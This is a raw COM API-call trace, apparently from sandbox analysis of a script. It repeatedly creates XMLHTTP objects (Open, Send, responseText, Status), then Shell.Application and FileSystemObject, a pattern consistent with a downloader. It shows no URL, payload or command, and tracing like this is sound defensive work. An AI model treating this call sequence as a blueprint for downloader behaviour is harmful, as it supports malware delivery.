	[0539.894] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5ba0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0539.894] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5ba0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0539.894] longjmp () 
	[0539.894] longjmp () 
	[0539.894] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0539.894] SysStringLen (param_1=0x0) returned 0x0
	[0539.894] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0539.894] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0539.894] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0539.894] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0539.894] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74b8) returned 0x0
	[0539.894] ??2@YAPEAX_K@Z () returned 0x62f310
	[0539.894] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74b8, pUnkSite=0x62f310) 
	[0539.895] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0539.895] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0539.895] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0539.895] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0539.895] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0539.895] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0539.895] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0539.895] longjmp () 
	[0539.895] longjmp () 
	[0539.895] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0539.896] SysStringLen (param_1=0x0) returned 0x0
	[0539.896] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0539.896] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0539.896] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0539.896] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0539.896] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7568) returned 0x0
	[0539.896] ??2@YAPEAX_K@Z () returned 0x62f330
	[0539.896] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7568, pUnkSite=0x62f330) 
	[0539.896] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0539.896] XMLHTTPRequest:IUnknown:Release (This=0x49c7568) returned 0x0
	[0539.896] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0539.896] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0539.896] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0539.896] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0539.897] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0539.897] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0539.897] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0539.897] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0540.592] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0540.592] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0540.592] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0540.592] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0540.592] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0540.592] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0540.593] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0540.593] SysStringLen (param_1=0x0) returned 0x0
	[0540.593] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0540.593] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0540.593] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0540.593] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0540.593] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0540.593] ??2@YAPEAX_K@Z () returned 0x62f350
	[0540.593] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0540.593] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0540.593] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0540.593] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0540.594] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0540.594] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0540.594] SysStringLen (param_1=0x0) returned 0x0
	[0540.594] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f000) returned 0x0
	[0540.596] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0540.596] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f000, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f030) returned 0x0
	[0540.596] FileSystemObject:IUnknown:Release (This=0x45f000) returned 0x0
	[0540.596] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0540.597] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f030) returned 0x0
	[0540.597] FileSystemObject:IUnknown:AddRef (This=0x45f030) returned 0x3
	[0541.978] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0541.978] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0541.978] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0541.979] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0541.980] SysStringLen (param_1=0x0) returned 0x0
	[0541.980] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0541.980] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0541.980] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7500) returned 0x0
	[0541.980] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0541.980] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c48) returned 0x0
	[0541.980] ??2@YAPEAX_K@Z () returned 0x62f330
	[0541.980] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c48, pUnkSite=0x62f330) 
	[0541.980] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0541.980] XMLHTTPRequest:IUnknown:Release (This=0x49c5c48) returned 0x0
	[0541.980] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7500) returned 0x0
	[0541.980] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7500) returned 0x3
	[0541.981] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0541.981] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7500, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0541.983] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7500, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0541.983] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0541.983] SysStringLen (param_1=0x0) returned 0x0
	[0541.983] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0541.983] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0541.983] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bc0) returned 0x0
	[0541.983] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0541.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7458) returned 0x0
	[0541.984] ??2@YAPEAX_K@Z () returned 0x62f310
	[0541.984] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7458, pUnkSite=0x62f310) 
	[0541.984] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0541.984] XMLHTTPRequest:IUnknown:Release (This=0x49c7458) returned 0x0
	[0541.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bc0) returned 0x0
	[0541.984] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bc0) returned 0x3
	[0541.984] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bc0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
